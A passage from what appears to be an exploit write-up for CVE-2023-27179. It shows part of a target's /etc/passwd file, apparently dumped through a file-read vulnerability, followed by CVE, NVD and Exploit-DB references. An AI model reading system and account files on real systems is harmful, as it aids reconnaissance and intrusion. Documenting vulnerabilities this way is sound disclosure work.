/>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />_apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br />systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin<br />systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin<br />systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin<br />ntp:x:104:110::/nonexistent:/usr/sbin/nologin<br />messagebus:x:105:111::/nonexistent:/usr/sbin/nologin<br />uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin<br />pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin<br />lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false<br />hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash<br />systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin<br />vboxadd:x:998:1::/var/run/vboxadd:/bin/false<br />openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br />sshd:x:110:65534::/run/sshd:/usr/sbin/nologin<br />mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false<br /><br /><br />### References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179<br />https://nvd.nist.gov/vuln/detail/CVE-2023-27179<br />https://www.exploit-db.com/papers/12883<br /><br /> <br /><br /></code></pre>